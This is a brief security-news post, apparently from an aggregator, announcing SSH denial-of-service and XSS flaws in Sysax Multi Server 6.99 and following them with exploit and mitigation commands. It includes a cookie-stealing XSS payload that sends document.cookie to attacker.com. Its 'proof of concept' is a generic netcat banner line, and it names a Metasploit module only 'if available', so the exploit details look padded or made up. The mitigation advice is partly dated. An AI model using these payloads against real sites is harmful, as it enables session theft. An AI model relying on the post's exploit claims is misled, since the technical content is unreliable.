Multiple 0-days Discovered in Sysax Multi Server 699 (SSH DoS & XSS)

Researchers have uncovered critical vulnerabilities in Sysax Multi Server 6.99, including a SSH Denial of Service (DoS) and Cross-Site Scripting (XSS) flaw. These 0-day vulnerabilities could allow attackers to crash services or execute malicious scripts.

Reference:

• SSH Denial of Service Details
• Cross-Site Scripting Details

You Should Know:

1. SSH Denial of Service (DoS) Exploitation

A flaw in Sysax Multi Server’s SSH service allows an attacker to trigger a crash, leading to service disruption.

Verification & Exploitation Steps:

 Crafting a malicious SSH request (PoC) 
echo -e "SSH-2.0-ExploitKit\r\n" | nc -nv <TARGET_IP> 22

Using Metasploit (if module available) 
msfconsole 
use auxiliary/dos/ssh/sysax_multiserver 
set RHOSTS <TARGET_IP> 
run 

Mitigation:

 Check for SSH service status (Linux) 
systemctl status sshd

Temporarily block abusive IPs 
iptables -A INPUT -s <ATTACKER_IP> -j DROP 

2. Cross-Site Scripting (XSS) Exploitation

The XSS vulnerability allows injecting malicious scripts via crafted inputs.

Testing for XSS:

// Basic XSS payload 
<script>alert('XSS')</script>

// Advanced payload (cookie theft) 
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> 

Mitigation:

 Web server filtering (Apache) 
ModSecurity - Enable XSS rules

Nginx filtering 
location / { 
add_header X-XSS-Protection "1; mode=block"; 
} 

What Undercode Say

The discovery of these 0-days highlights the risks of unpatched enterprise software. Immediate patching and network segmentation are critical.

Additional Commands for Security Checks:

 Check open SSH ports 
nmap -p 22 <TARGET_IP>

Log analysis for XSS attempts 
grep -i "script" /var/log/nginx/access.log

Windows command to check running services 
netstat -ano | findstr ":22" 

Prediction

Expect increased exploitation attempts as details become public. Organizations using Sysax Multi Server should apply patches or disable exposed services.

Expected Output:

• Service crash (SSH DoS)
• Malicious script execution (XSS)
• Log entries indicating attack patterns

References:

Reported By: Yehiamamdouh I – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram